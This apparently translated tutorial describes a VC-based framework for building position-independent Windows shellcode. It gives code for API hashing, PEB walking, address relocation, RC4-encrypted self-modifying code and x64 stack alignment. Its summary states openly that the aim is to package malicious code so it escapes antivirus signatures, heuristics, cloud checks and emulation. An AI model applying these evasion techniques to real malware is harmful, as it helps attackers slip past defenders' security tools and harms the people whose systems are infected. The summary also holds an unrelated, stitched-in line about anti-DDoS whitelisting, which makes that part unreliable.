Advanced Shellcode Programming Techniques on Windows

Source: Internet
Author: User

1. Preface

2. The concept of functional shellcode

3. Choice of high-level language

4. x86 c2shellcode framework

5. x64 c2shellcode framework

6. Summary

7. Thanks

1. Preface

The techniques described in this article have been used in practice for a long time but, for various reasons, were never written up. This article gives code for the key points and adds some of the author's own observations.

The directory structure of the test code is as follows:

test1: 32-bit and 64-bit shellcode with the corresponding test tools

test2: x86 c2shellcode framework

test3: shellcode coding technique that uses the dup directive to reserve space in the .text section

test4: a second layer of SMC (self-modifying code) in the shellcode

test5: x64 c2shellcode framework

2. The concept of functional shellcode

This is an era of intense attack and defense. Antivirus detection is now multi-layered: signatures, cloud lookups, host-based active defense, heuristics, and virtual-machine emulation. Malicious code that is tied to a fixed PE format cannot be mutated quickly enough to avoid detection. It needs to escape static detection after only simple processing, and it needs to load and run without relying on the Windows loader. Shellcode fits these requirements exactly. The shellcode discussed in this article is not the traditional kind, where length is tightly constrained. It may be built from thousands or tens of thousands of lines of source code, yet once it has been copied into memory (for example with CopyMemory) and EIP is pointed at it, it loads and runs as plain binary code. We call this functional shellcode. Because of the amount of code and the functionality required, writing functional shellcode in pure assembly is clearly not cost-effective.

3. Choice of high-level language

1. Writing functional shellcode in Delphi

The compilers most commonly used for shellcode today are Delphi and VC. A brief word on Delphi: the Borland compiler does not place string constants in the data segment at compile time but immediately after the function, which makes strings much easier to handle than in VC. Delphi also supports x64 inline assembly, which makes it even more convenient for writing x64 shellcode. Early practitioners such as Anskya (Queen) and xfish generally used Delphi to write functional shellcode.

2. Writing functional shellcode in VC

The test1 directory contains two binaries, 32shellcode.bin and 64shellcode.bin. These are two pieces of shellcode that run on x86 and x64 respectively. You can start the DebugView tool to capture their log output. Run the following commands to test them:

    32runbin.exe 32shellcode.bin

    64runbin.exe 64shellcode.bin

On an x64 system, 32shellcode.bin also runs reliably under WOW64.

Next we introduce functional shellcode written in VC.

4. x86 c2shellcode framework

1. Overview of the c2shellcode framework

This is a 32-bit shellcode framework built with VS2008. It makes it easy to call native APIs and ring3 APIs from shellcode. After commenting out the HHL_DEBUG switch, run the generated EXE to produce the shellcode.

Let's take a look at this project.

    void main()
    {
    #ifdef HHL_DEBUG
        InitApiHashToStruct();
        ShellCode_Start();
    #else
        InitApiHashToStruct();
    #endif
    }

The main function is simple and is controlled by one debugging switch. The switch affects the global ShellData struct. When the switch is commented out, ShellData is appended to the tail of the shellcode. When it is enabled, ShellData lives in the .data section, which makes it easy to debug the C source in the VC IDE.

2. Execution flow with the HHL_DEBUG switch enabled

2.1 Fill the function hashes into the ShellData struct

The first step is the InitApiHashToStruct function. It uses a fairly traditional rotate-and-add hash. You can call GetRolHash with a string to compute a single hash, or fill the hashes into the ShellData struct in a batch.

    DWORD GetRolHash(char *lpszBuffer)
    {
        DWORD dwHash = 0;
        while (*lpszBuffer)
        {
            dwHash = ((dwHash << 25) | (dwHash >> 7));
            dwHash = dwHash + *lpszBuffer;
            lpszBuffer++;
        }
        return dwHash;
    }
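The hash above can be tried outside the framework. The following is a minimal portable sketch, assuming only standard C; the names ror7 and rol_hash are hypothetical and do not come from the original project. It reads each character as unsigned, which gives the same result as GetRolHash for plain ASCII names.

```c
#include <stdint.h>

/* Rotate a 32-bit value right by 7 bits.
   This is the same operation as (h << 25) | (h >> 7) in GetRolHash. */
static uint32_t ror7(uint32_t v)
{
    return (v >> 7) | (v << 25);
}

/* Hypothetical portable equivalent of GetRolHash:
   rotate the running hash, then add the next character. */
uint32_t rol_hash(const char *s)
{
    uint32_t h = 0;
    while (*s) {
        h = ror7(h);
        h += (uint32_t)(unsigned char)*s; /* unsigned read; identical for ASCII input */
        s++;
    }
    return h;
}
```

For a one-character string the hash is simply the character code, because rotating zero leaves zero. Each further character first rotates the previous result and then adds its own code.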

2.2 Scan the export table by function hash to obtain function addresses

The ShellCode_Start function simply jumps to ShellCodeEntry, where the shellcode starts executing.

    __declspec(naked) void ShellCode_Start()
    {
        __asm
        {
            jmp ShellCodeEntry
        }
    }

Note how the local string is defined in the ShellCodeEntry function. You can check the result with IDA.

    PVOID ShellCodeEntry()
    {
        char hhl[] = {'h','e','l','l','o','g','i','r','l',0};
    #ifndef HHL_DEBUG
        DWORD      offset = ReleaseRebaseShellCode();
        PShellData lpData = (PShellData)(offset + (DWORD)Shellcode_Final_End);
    #endif
        GetRing3ApiAddr();
        lpData->xOutputDebugStringA(hhl);
        return (PVOID)lpData;
    }

A string defined this way is built on the stack by instructions in the .text section and then passed as a parameter, rather than being stored in the .data section.

 

The GetRing3ApiAddr function is mainly responsible for the following:

1. Get the kernel32 base address through the get_k32base_peb() function.

2. Get the ntdll base address through the get_ntdllbase_peb() function. You can also load ntdll directly with LoadLibrary.

3. Obtain the addresses of the LoadLibrary and GetProcAddress functions.

4. Load the other required modules, such as psapi and advapi32, to obtain their base addresses.

5. Pass the hash of each required function and the base address of its module to the Hash_GetProcAddress function, which parses the export table, obtains the function address, and fills it into the ShellData struct.

    __declspec(naked) DWORD get_k32base_peb()
    {
        __asm
        {
            mov   eax, fs:[030h]      ; PEB
            test  eax, eax
            js    finished
            mov   eax, [eax + 0ch]    ; PEB->Ldr
            mov   eax, [eax + 14h]    ; InMemoryOrderModuleList.Flink
            mov   eax, [eax]          ; next entry
            mov   eax, [eax]          ; next entry
            mov   eax, [eax + 10h]    ; DllBase
    finished:
            ret
        }
    }

This code obtains the base address of kernel32 on Windows XP through Windows 8.1.

2.3 Pass the parameters and call through the function address

Finally, OutputDebugStringA is called to test the shellcode by printing a string.

    lpData->xOutputDebugStringA(hhl);

3. Execution flow with the HHL_DEBUG switch disabled

    #ifndef HHL_DEBUG
        dwSize = (DWORD)Shellcode_Final_End - (DWORD)ShellCode_Start;
        dwShellCodeSize = dwSize + sizeof(TShellData);
        lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED, dwShellCodeSize);
        if (lpBuffer)
        {
            CopyMemory(lpBuffer, ShellCode_Start, dwSize);
            CopyMemory(lpBuffer + dwSize, &ShellData, sizeof(TShellData));
            hFile = CreateFileA("GetRing3ApiAddr.bin", GENERIC_WRITE, FILE_SHARE_READ,
                                NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0);
            if (hFile != INVALID_HANDLE_VALUE)
            {
                if (WriteFile(hFile, lpBuffer, dwShellCodeSize, &dwBytes, NULL))
                {
                    printf("Save ShellCode Success.\n");
                }
                CloseHandle(hFile);
            }
            GlobalFree(lpBuffer);
        }
    #endif

With the HHL_DEBUG switch commented out, all the program does is copy a specified region of memory and write it to a file. But how do we determine which region to copy?

4. How to determine the start and end of the shellcode

Load the generated PE file into IDA, and you can see the start and end addresses of the binary code.

You only need to copy from ShellCode_Start to the end of the InitApiHashToStruct function.
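The resulting layout (code bytes first, data struct appended at the tail) can be pictured with ordinary buffers. The sketch below is an illustration only, assuming standard C; DemoData and pack_code_and_data are hypothetical names, and DemoData merely stands in for TShellData.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for TShellData: a small block of global data. */
typedef struct {
    unsigned int values[4];
} DemoData;

/* Build one contiguous image: [code bytes][data struct].
   The data therefore starts at offset code_size, which is why the
   framework can find it from the end marker of the code.
   Returns a malloc'ed buffer (caller frees) or NULL on failure. */
unsigned char *pack_code_and_data(const unsigned char *code, size_t code_size,
                                  const DemoData *data, size_t *out_size)
{
    size_t total = code_size + sizeof(DemoData);
    unsigned char *image = (unsigned char *)malloc(total);
    if (image == NULL) {
        return NULL;
    }
    memcpy(image, code, code_size);                   /* first the code region   */
    memcpy(image + code_size, data, sizeof(DemoData)); /* then the data at the tail */
    *out_size = total;
    return image;
}
```

The two memcpy calls correspond to the two CopyMemory calls in the generator: the total size is the code size plus the size of the struct, and the struct begins exactly where the code ends.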

5. Notes on c2shellcode

1. Jump instructions must use relative addressing.

2. Avoid storing strings in the .data section.

3. Handle global variables properly.

In the c2shellcode framework, global variables are stored in TShellData and accessed by the shellcode through the lpData pointer. Because the shellcode can be loaded at any address, the address of TShellData must be relocated before it is used. The function that computes the relocation offset is ReleaseRebaseShellCode.

    DWORD ReleaseRebaseShellCode()
    {
        DWORD dwOffset;
        __asm
        {
            call  GetEIP
    GetEIP:
            pop   eax
            sub   eax, offset GetEIP
            mov   dwOffset, eax
        }
        return dwOffset;
    }

Adding this offset to the link-time address of the end marker gives a pointer to TShellData, which stores the global variables of the shellcode:

    PShellData lpData = (PShellData)(offset + (DWORD)Shellcode_Final_End);
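The arithmetic behind this relocation can be checked with plain integers. The sketch below is only an illustration under assumed addresses; rebase_delta and rebase_addr are hypothetical helper names, not part of the framework. The delta is the difference between where a label actually is at run time and where the linker placed it, and the same delta is then added to any other link-time address.

```c
#include <stdint.h>

/* Difference between the run-time address of a label and the address
   the linker assigned to it. Unsigned 32-bit arithmetic wraps, so the
   result is also correct when the code is loaded at a lower address. */
uint32_t rebase_delta(uint32_t runtime_label, uint32_t linktime_label)
{
    return runtime_label - linktime_label;
}

/* Translate any link-time address into its run-time address. */
uint32_t rebase_addr(uint32_t linktime_addr, uint32_t delta)
{
    return linktime_addr + delta;
}
```

For example, if a label linked at 0x00401020 is found at 0x00A50020 at run time, the delta is 0x0064F000, and an end marker linked at 0x00401400 is found at 0x00A50400.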

 

6. Advantages of writing shellcode in a high-level language

The advantage of writing shellcode in a high-level language is that you do not have to worry about stack balance, and you can use compiler optimization options to reduce the size of the generated shellcode.

Debugging is also far easier. You only need to care about implementing the functionality, not about trivial details such as whether a function address was obtained correctly, and the source code is much more readable. With the symbol table loaded, the shellcode can be debugged at the C source level in the VC IDE, and you can see at a glance whether the function addresses in the struct have been filled in correctly.

7. Calling ASM from C, and using the dup directive to reserve space in the .text section

The c2shellcode framework in test2 appends the global struct to the end of the shellcode, but this is not strictly necessary. The VC toolchain allows ASM to call C and C to call ASM. This works on both 32-bit and 64-bit platforms. The related code is in the test3 directory.

    .386
    .model flat, c
    .code

    public AsmShellData
    public AsmChar
    public hellohhl

    AsmShellData proc
        byte 2000 dup (8)
    AsmShellData endp

    AsmChar proc
        byte 2000 dup (6)
    AsmChar endp

    hellohhl proc
        sztext db 'hellohhl', 0
    hellohhl endp

    end

This is the assembly code.

In AsmShellData, the dup directive reserves 2000 bytes in the .text section.

Using 0 as the fill value is not recommended here, because an additional .bss section is then added when the obj file is linked. A value of 0 is treated as uninitialized, and the .bss section is where uninitialized data is stored.

The ASM file exports several new symbols.

AsmShellData is a dup placeholder used to store the global variables of the shellcode.

AsmChar is a dup placeholder used to store the global strings of the shellcode.

hellohhl marks the end of the shellcode.

Note that two new macros are defined.

    #define shellcode_final_end   hellohhl

    #define shellcode_final_start ShellCode_Start

Why are they defined this way? Load the binary into IDA.

The start and end of the shellcode are clearly visible. You only need to copy the code from shellcode_final_start (ShellCode_Start) up to hellohhl to get the shellcode.

    #ifndef HHL_DEBUG
        b1 = VirtualProtect(AsmShellData, sizeof(TShellData), PAGE_EXECUTE_READWRITE, &dwOldProtect);
        CopyMemory(AsmShellData, &ShellData, sizeof(TShellData));
        dwSize = (DWORD)shellcode_final_end - (DWORD)shellcode_final_start;
        lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED, dwSize);
        if (lpBuffer)
        {
            CopyMemory(lpBuffer, shellcode_final_start, dwSize);
            hFile = CreateFileA("hhlsh.bin", GENERIC_WRITE, FILE_SHARE_READ,
                                NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
            if (hFile != INVALID_HANDLE_VALUE)
            {
                if (WriteFile(hFile, lpBuffer, dwSize, &dwBytes, NULL))
                {
                    printf("Save ShellCode Success.\n");
                }
                CloseHandle(hFile);
            }
            GlobalFree(lpBuffer);
        }
    #endif

Because the AsmShellData placeholder created with the dup directive is located in the .text section, you must first use VirtualProtect to change the memory protection and only then copy the global variables into this space. The code still needs to be relocated, but this time the pointer can be pointed at AsmShellData.

    #ifndef HHL_DEBUG
        DWORD      offset = ReleaseRebaseShellCode();
        PShellData lpData = (PShellData)((DWORD)AsmShellData + offset);
    #endif

We can see that the memory is allocated only once, and we do not need to copy the ShellData struct to the end of shellcode.

8. Applying SMC multiple times in shellcode

You may have noticed that the shellcode has relied on SMC (self-modifying code) from the very beginning. A large region stores hashes, and at run time this region rewrites itself into function addresses. You may not be fully satisfied with a single layer of SMC, however.

I do not intend to use the traditional xor method for self-decryption. This time we use standard RC4. The project is located in the test4 directory, where you can see how code is added to c2shellcode. If you wish, you can set some conditions and write a loop so that the shellcode is decrypted 4 bytes at a time. I believe this raises the bar for reverse analysis.

In the shellcode_ntapi_utility.h header file, we added two new RC4 encryption and decryption functions for the shellcode to call.

We use hellogirl as the key to encrypt the hash region when generating the shellcode.

When the shellcode starts executing, the hash region is decrypted entry by entry, and SMC then turns the hash region back into real API addresses.

Run runbin.exe hhlsh.bin. After the shellcode decrypts itself with RC4, the familiar string appears in DebugView again.

The related code is in the test4 directory and is not analyzed in detail here.

5. x64 c2shellcode framework

I do not recommend mixing 32-bit and 64-bit code in a single project by means of preprocessor directives.

The 64-bit c2shellcode is located in the test5 directory and differs from the 32-bit version.

We again walk through the x64 c2shellcode framework starting from the main function.

    void main()
    {
    #ifdef HHL_DEBUG
        InitApiHashToStruct();
        AlignRSPAndCallShEntry();
    #else
        InitApiHashToStruct();
    #endif
    }

As in the 32-bit c2shellcode framework, the InitApiHashToStruct function fills the hash data into the ShellData struct.

The entry function of the shellcode is a function exported from ASM.

First, look at the code in the asm file. The AlignRSPAndCallShEntry function aligns the stack pointer to 16 bytes. Without this, the program crashes as soon as an instruction that requires aligned 128-bit XMM operands is executed. Once the alignment is done, the 64-bit shellcode is executed directly.

    EXTRN ShellCode_Entry:PROC   ; this function is in C
    PUBLIC AlignRSPAndCallShEntry

    AlignRSPAndCallShEntry PROC
        push rsi
        mov  rsi, rsp
        and  rsp, 0FFFFFFFFFFFFFFF0h
        sub  rsp, 020h
        call ShellCode_Entry
        mov  rsp, rsi
        pop  rsi
        ret
    AlignRSPAndCallShEntry ENDP

In the AlignRSPAndCallShEntry function, ASM calls C: control passes to the C function ShellCode_Entry, where execution continues.
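The stack adjustment in AlignRSPAndCallShEntry can be checked with integer arithmetic. The sketch below is an illustration in standard C with hypothetical function names. It mirrors the two instructions "and rsp, 0FFFFFFFFFFFFFFF0h" and "sub rsp, 020h". The 0x20 bytes are the 32-byte shadow space that the Windows x64 calling convention requires the caller to reserve.

```c
#include <stdint.h>

/* Clear the low four bits: round a stack pointer down to a 16-byte boundary. */
uint64_t align_down_16(uint64_t sp)
{
    return sp & 0xFFFFFFFFFFFFFFF0ull;
}

/* Align, then reserve the 32-byte shadow space for the callee.
   32 is a multiple of 16, so the result stays 16-byte aligned. */
uint64_t aligned_sp_with_shadow(uint64_t sp)
{
    return align_down_16(sp) - 0x20;
}
```

Because the stack grows downward, rounding down never overwrites data that is already on the stack. The original value is kept in rsi by the assembly routine so that it can be restored after the call.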

    PVOID ShellCode_Entry()
    {
        char hhl[] = {'h','e','l','l','o','h','h','l',0};
    #ifndef HHL_DEBUG
        PShellData lpData = (PShellData)((ULONG64)Shellcode_Final_End);
    #endif
        GetRing3ApiAddr();
        lpData->xOutputDebugStringA(hhl);
        return (PVOID)lpData;
    }

On 64-bit systems we still need to get the base address of kernel32 and then parse the export table to get the addresses of the required functions.

    PUBLIC get_kernel32_peb_64

    get_kernel32_peb_64 PROC
        mov rax, 30h
        mov rax, gs:[rax]
        mov rax, [rax+60h]
        mov rax, [rax+18h]
        mov rax, [rax+10h]
        mov rax, [rax]
        mov rax, [rax]
        mov rax, [rax+30h]    ; DllBase
        ret
    get_kernel32_peb_64 ENDP

The code above obtains the kernel32 base address on x64 Windows 7 through Windows 8.1.

When the HHL_DEBUG switch is removed to generate the shellcode, we still need to locate ShellData. Because x64 code uses RIP-relative addressing, the end marker of the shellcode is enough to locate ShellData, which holds the global variables.

    PShellData lpData = (PShellData)((ULONG64)Shellcode_Final_End);

To generate the shellcode, we only need to copy the binary code of the specified region. Here we still use the approach in which ShellData is appended to the tail of the shellcode to hold the global variables. If you prefer, you can still use the dup directive to reserve space in the .text section for them.

    dwSize = (ULONG64)Shellcode_Final_End - (ULONG64)Shellcode_Final_Start;
    dwShellCodeSize = dwSize + sizeof(TShellData);
    lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED, dwShellCodeSize);
    if (lpBuffer)
    {
        CopyMemory(lpBuffer, Shellcode_Final_Start, dwSize);
        CopyMemory(lpBuffer + dwSize, &ShellData, sizeof(TShellData));
        hFile = CreateFileA("64shellcode.bin", GENERIC_WRITE, FILE_SHARE_READ,
                            NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
        if (hFile != INVALID_HANDLE_VALUE)
        {
            if (WriteFile(hFile, lpBuffer, dwShellCodeSize, &dwBytes, NULL))
            {
                printf("Save ShellCode Success.\n");
            }
            CloseHandle(hFile);
        }
        GlobalFree(lpBuffer);
    }

Again, look at the result in IDA.

    PUBLIC MyShellCodeFinalEnd

    MyShellCodeFinalEnd PROC
        xor rax, rax
        ret
    MyShellCodeFinalEnd ENDP

    END

The binary code between ShellCode_Start and MyShellCodeFinalEnd is the shellcode.

6. Summary

Once you have read through c2shellcode, you will find that there is nothing new in it. A few compiler features (for example inline assembly, and the dup directive to reserve space in the .text section) make it easy to handle global variables, strings, and the start and end of the shellcode.

What is shellcode? Whether it is code or data, a binary blob is shellcode as long as it is position-independent. Whatever compiler you use, GCC, Delphi, or VC, if the binary output is position-independent, or is made position-independent by post-processing, it is shellcode.

Functional shellcode is mainly used to counter antivirus software quickly.

Packaging malicious code as shellcode: counters signatures and cloud detection.

Self-modifying code with multi-layer SMC: counters heuristics, virtual machines, and cloud detection.

Randomized code sections and PE structure: counters PE-structure-based detection and cloud detection.

Whitelist technology defends against foreign anti-DDoS attacks

1. About multi-layer SMC

The hash region (ShellData) that holds the API addresses must be decrypted several times with a key before the real API addresses are restored, and every API address the code uses comes from the ShellData region. The key can be written to a registry value or a binary file, or received over the network, before the SMC step runs. Without the key, an antivirus virtual machine cannot emulate the code's API calls.

2. About randomized code sections and PE structure

An existing method is to use the following directives.

    #pragma code_seg(push, r2, ".test")

    // ... your code here ...

    #pragma code_seg(pop, r2)

This places the code in a .test section. Alternatively, use the following directives to merge sections.

    #pragma comment(linker, "/MERGE:.rdata=.data")  // merge the .rdata section into .data

    #pragma comment(linker, "/MERGE:.text=.data")   // merge the .text section into .data

    #pragma comment(linker, "/MERGE:.reloc=.data")  // merge the .reloc section into .data

However, this makes it easy to tell that the PE has been manually modified, and heuristics that inspect the PE structure will flag it.

Using the dup directive to reserve space in the .text section, combined with SMC, gives control over almost every byte of the code.
